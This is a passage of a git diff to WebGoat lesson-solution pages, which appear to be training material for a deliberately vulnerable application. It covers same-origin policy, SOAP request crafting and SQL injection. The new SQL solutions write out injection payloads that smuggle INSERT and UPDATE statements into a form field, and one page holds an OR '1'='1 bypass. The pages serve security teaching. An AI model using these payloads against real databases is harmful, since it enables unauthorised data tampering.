+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b>Lesson
+Plan Title:</b><span style='font-family:"Arial","sans-serif"'>  Same Origin Policy Protection. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous calls from the client side to a server. However, as a security measure these requests may only be made to the server from which the client page originated. <o:p></o:p></span></p>
+
+<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This exercise demonstrates the Same Origin Policy Protection. XHR requests can only be passed back to the originating server. Attempts to pass data to a non-originating server will fail.<br style='mso-special-character:line-break'>
+<![if !supportLineBreakNewLine]>
+<![endif]><o:p></o:p></span></p>
+<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click both of the links on the page to see their behavior and complete the lesson. <o:p></o:p></span></p>
+
+<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;&nbsp;</o:p></span></b>
+
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+
+</body>
+
+</html>
diff --git a/webgoat/src/main/webapp/lesson_solutions/SilentTransactions.html b/webgoat/src/main/webapp/lesson_solutions/SilentTransactions.html
index ced7ca01b..da814a15d 100644
--- a/webgoat/src/main/webapp/lesson_solutions/SilentTransactions.html
+++ b/webgoat/src/main/webapp/lesson_solutions/SilentTransactions.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Silent Transcations Attacks</title>
 <link rel=File-List href="lesson_solutions/SilentTransactions_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/SilentTransactions_files/editdata.mso">
 <!--[if !mso]>
@@ -693,7 +694,6 @@ transferring money. Examining the HTML source reveals that two JavaScript
 functions are being used:<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;script&gt;<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
@@ -839,7 +839,6 @@ style='mso-tab-count:4'>
 style='mso-spacerun:yes'>        </span>}}}<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/script&gt;<o:p></o:p></span></p>
-
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The function
diff --git a/webgoat/src/main/webapp/lesson_solutions/SoapRequest.html b/webgoat/src/main/webapp/lesson_solutions/SoapRequest.html
index 44a07f45c..58a40a193 100644
--- a/webgoat/src/main/webapp/lesson_solutions/SoapRequest.html
+++ b/webgoat/src/main/webapp/lesson_solutions/SoapRequest.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Create a SOAP Request</title>
 <link rel=File-List href="lesson_solutions/SoapRequest_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/SoapRequest_files/editdata.mso">
 <!--[if !mso]>
@@ -775,30 +776,20 @@ HTTP Request with WebScarab and click on the 
 <ol style='margin-top:0cm' start=1 type=1>
  <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
      style='font-family:"Arial","sans-serif"'>Change the POST header to open
-     the SoapRequest. <o:p></o:p></span></li>
+     the SoapRequest: <br/>
+     POST http://localhost/webgoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
  <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
      style='font-family:"Arial","sans-serif"'>Change the Content-Type to
-     text/xml. <o:p></o:p></span></li>
+     text/xml:<br/>
+     Content-Type: text/xml <o:p></o:p></span></li>
  <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
-     style='font-family:"Arial","sans-serif"'>Add a header SOAPAction. <o:p></o:p></span></li>
+     style='font-family:"Arial","sans-serif"'>Add a header SOAPAction.<br/>
+     SOAPAction: <b>(No value needs to be specified for this header)</b> <o:p></o:p></span></li>
  <li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
      style='font-family:"Arial","sans-serif"'>Append the XML envelope to the
-     request<o:p></o:p></span></li>
+     request:<o:p></o:p></span></li>
 </ol>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
-<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>POST
-http://neo:80services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
-
-<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>Content-Type:
-text/xml<o:p></o:p></span></p>
-
-<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>SOAPAction:
-<o:p></o:p></span></p>
-
-<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
-
 <p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;?xml
 version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; <o:p></o:p></span></p>
 
@@ -834,6 +825,20 @@ style='mso-spacerun:yes'>
 
 <p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;/SOAP-ENV:Envelope&gt;<o:p></o:p></span></p>
 
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p><br/>It is important that there is no whitespace (carriage returns or spaces) from the SOAPAction header to the opening XML tag. This generates an error instead of the desired response.</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><img 
+src="lesson_solutions/SoapRequest_files/image011.jpg"></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Updated HTTP request with SOAP parameters<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The response
@@ -850,7 +855,7 @@ src="lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
 <span style='mso-element:field-separator'></span><![endif]--><span
-style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
+style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
 field-end'></span><![endif]--> Intercept response<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
diff --git a/webgoat/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg b/webgoat/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg
new file mode 100644
index 000000000..fc258a811
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/SoapRequest_files/image011.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/SqlAddData.html b/webgoat/src/main/webapp/lesson_solutions/SqlAddData.html
new file mode 100644
index 000000000..5e0ba4aba
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/SqlAddData.html
@@ -0,0 +1,43 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: Modify Data with SQL</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Add Data with SQL</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. 
+<br><br>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
+<br>
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to add a record to the table.
+</p>
+
+<b>Solution:</b><br/><br/>
+In this lesson, we will use the INSERT query, which uses the format:<br/>
+<b>INSERT INTO table VALUES (value1, value2);</b><br/><br/>
+In this case, the salaries table has two relevant columns: column 1 is userid, and column 2 is salary.
+We will use the command:<br/>
+<b>INSERT INTO salaries VALUES ('rlupin',140000);</b> <br/><br/>
+This, however, will not work correctly. We are inserting this in between two single quotes in the command:<br/>
+SELECT * FROM salaries WHERE userid='<b><font color="blue">userid</font></b>';<br/><br/>
+If we treated this lesson as we have treated the previous one, our command would look like this:<br/>
+SELECT * FROM salaries WHERE userid='<b><font color="blue">whatever'; INSERT INTO salaries VALUES ('rlupin',150000);</font></b>'<br/><br/>
+The statement cannot end with a single quote after the semicolon, so we must comment out the quote using <b>--</b>.<br/>
+To complete this lesson, type the following into the field and press go:<br/>
+<b>whatever'; INSERT INTO salaries VALUES ('rlupin',140000);--</b><br/><br/>
+If you then search for the userid rlupin, you will see there is new record.<br/><br/>
+
+<img src="lesson_solutions/SqlAddData_files/image001.jpg"><br/>
+<font size="2"><b>New employee record after using an INSERT query.</b></font><br/><br/><br/>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg b/webgoat/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg
new file mode 100644
index 000000000..025d0c4c0
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/SqlAddData_files/image001.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/SqlModifyData.html b/webgoat/src/main/webapp/lesson_solutions/SqlModifyData.html
new file mode 100644
index 000000000..90594689a
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/SqlModifyData.html
@@ -0,0 +1,39 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: Modify Data with SQL</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Modify Data with SQL</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. 
+<br><br>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
+<br>
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith.
+</p>
+
+<b>Solution:</b><br/><br/>
+In this lesson, instead of using the SELECT query command, we use the UPDATE command, which uses the format:<br/>
+<b>UPDATE table SET column=value WHERE column=value;</b><br/><br/>
+We need to update the table <b>salaries</b>, setting the <b>salary</b> column to a new number.<br/>
+We will use the command:<br/>
+<b>UPDATE salaries SET salary=999999 WHERE userid='jsmith'</b> <br/><br/>
+We also need to end the previous query and leave our last quote open to make a valid statment.<br/>
+To complete this lesson, type the following into the field and press go:<br/>
+<b>whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith</b><br/><br/>
+If you then search for the userid jsmith, you will see the salary has been updated.<br/><br/>
+
+<img src="lesson_solutions/SqlModifyData_files/image001.jpg"><br/>
+<font size="2"><b>Updated salary after using a MODIFY query.</b></font><br/><br/><br/>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg b/webgoat/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg
new file mode 100644
index 000000000..0b5b82073
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/SqlModifyData_files/image001.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/SqlStringInjection.html b/webgoat/src/main/webapp/lesson_solutions/SqlStringInjection.html
index 3736e471a..725648e08 100644
--- a/webgoat/src/main/webapp/lesson_solutions/SqlStringInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/SqlStringInjection.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: SQL String Injection</title>
 <link rel=File-List href="lesson_solutions/SqlStringInjection_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/SqlStringInjection_files/editdata.mso">
 <!--[if !mso]>
@@ -671,7 +672,7 @@ used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'<o:
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter for the
-last name value: Erwin' OR '1'='1 <o:p></o:p></span></p>
+last name value: <b>Erwin' OR '1'='1</b> <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html b/webgoat/src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html
index c08f8d428..926440486 100644
--- a/webgoat/src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html
+++ b/webgoat/src/main/webapp/lesson_solutions/WeakAuthenticationCookie.html
@@ -10,6 +10,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Spoof an Authentication Cookie</title>
 <link rel=File-List href="lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
 <!--[if !mso]>
diff --git a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID.html b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID.html
index bff30792e..2bfff1bc5 100644
--- a/webgoat/src/main/webapp/lesson_solutions/WeakSessionID.html
+++ b/webgoat/src/main/webapp/lesson_solutions/WeakSessionID.html
@@ -1,888 +1,90 @@
-<html xmlns:v="urn:schemas-microsoft-com:vml"
-xmlns:o="urn:schemas-microsoft-com:office:office"
-xmlns:w="urn:schemas-microsoft-com:office:word"
-xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
-xmlns="http://www.w3.org/TR/REC-html40">
-
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
 <head>
-<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
-<meta name=ProgId content=Word.Document>
-<meta name=Generator content="Microsoft Word 12">
-<meta name=Originator content="Microsoft Word 12">
-<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
-<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
-<!--[if !mso]>
-<style>
-v\:* {behavior:url(#default#VML);}
-o\:* {behavior:url(#default#VML);}
-w\:* {behavior:url(#default#VML);}
-.shape {behavior:url(#default#VML);}
-</style>
-<![endif]--><!--[if gte mso 9]><xml>
- <o:DocumentProperties>
-  <o:Author>egeirnaert</o:Author>
-  <o:LastAuthor>egeirnaert</o:LastAuthor>
-  <o:Revision>3</o:Revision>
-  <o:TotalTime>27</o:TotalTime>
-  <o:Created>2007-07-11T10:54:00Z</o:Created>
-  <o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
-  <o:Pages>3</o:Pages>
-  <o:Words>469</o:Words>
-  <o:Characters>2677</o:Characters>
-  <o:Company> </o:Company>
-  <o:Lines>22</o:Lines>
-  <o:Paragraphs>6</o:Paragraphs>
-  <o:CharactersWithSpaces>3140</o:CharactersWithSpaces>
-  <o:Version>12.00</o:Version>
- </o:DocumentProperties>
-</xml><![endif]-->
-<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
-<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
-<!--[if gte mso 9]><xml>
- <w:WordDocument>
-  <w:TrackMoves>false</w:TrackMoves>
-  <w:TrackFormatting/>
-  <w:PunctuationKerning/>
-  <w:ValidateAgainstSchemas/>
-  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
-  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
-  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
-  <w:DoNotPromoteQF/>
-  <w:LidThemeOther>EN-US</w:LidThemeOther>
-  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
-  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
-  <w:Compatibility>
-   <w:BreakWrappedTables/>
-   <w:SnapToGridInCell/>
-   <w:WrapTextWithPunct/>
-   <w:UseAsianBreakRules/>
-   <w:DontGrowAutofit/>
-   <w:SplitPgBreakAndParaMark/>
-   <w:DontVertAlignCellWithSp/>
-   <w:DontBreakConstrainedForcedTables/>
-   <w:DontVertAlignInTxbx/>
-   <w:Word11KerningPairs/>
-   <w:CachedColBalance/>
-  </w:Compatibility>
-  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
-  <m:mathPr>
-   <m:mathFont m:val="Cambria Math"/>
-   <m:brkBin m:val="before"/>
-   <m:brkBinSub m:val="--"/>
-   <m:smallFrac m:val="off"/>
-   <m:dispDef/>
-   <m:lMargin m:val="0"/>
-   <m:rMargin m:val="0"/>
-   <m:defJc m:val="centerGroup"/>
-   <m:wrapIndent m:val="1440"/>
-   <m:intLim m:val="subSup"/>
-   <m:naryLim m:val="undOvr"/>
-  </m:mathPr></w:WordDocument>
-</xml><![endif]--><!--[if gte mso 9]><xml>
- <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
-  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
-  LatentStyleCount="267">
-  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
-  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
-  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
-  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
-  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
-  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
-  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
-  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
-  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
-  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
-  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
-  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Table Grid"/>
-  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
-  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
-  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Shading"/>
-  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light List"/>
-  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Grid"/>
-  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 1"/>
-  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 2"/>
-  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 1"/>
-  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 2"/>
-  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 1"/>
-  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 2"/>
-  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 3"/>
-  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Dark List"/>
-  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Shading"/>
-  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful List"/>
-  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Grid"/>
-  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
-  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light List Accent 1"/>
-  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
-  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
-  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
-  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
-  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
-  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
-  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
-  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
-   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
-  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
-  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
-  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
-  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
-  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
-  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
-  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
-  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
-  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
-  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light List Accent 2"/>
-  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
-  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
-  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
-  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
-  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
-  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
-  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
-  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
-  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
-  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
-  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
-  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
-  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
-  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
-   UnhideWhenUsed="false" Name="Light List Accent 3"/>
-  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
